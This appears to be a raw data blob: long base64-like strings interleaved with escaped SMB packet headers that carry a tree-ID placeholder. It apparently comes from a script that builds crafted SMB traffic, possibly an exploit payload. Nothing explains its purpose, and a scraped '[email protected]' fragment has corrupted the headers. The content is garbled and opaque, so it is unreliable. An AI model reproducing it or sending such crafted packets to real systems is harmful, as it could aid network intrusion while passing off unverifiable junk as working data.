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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xb3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\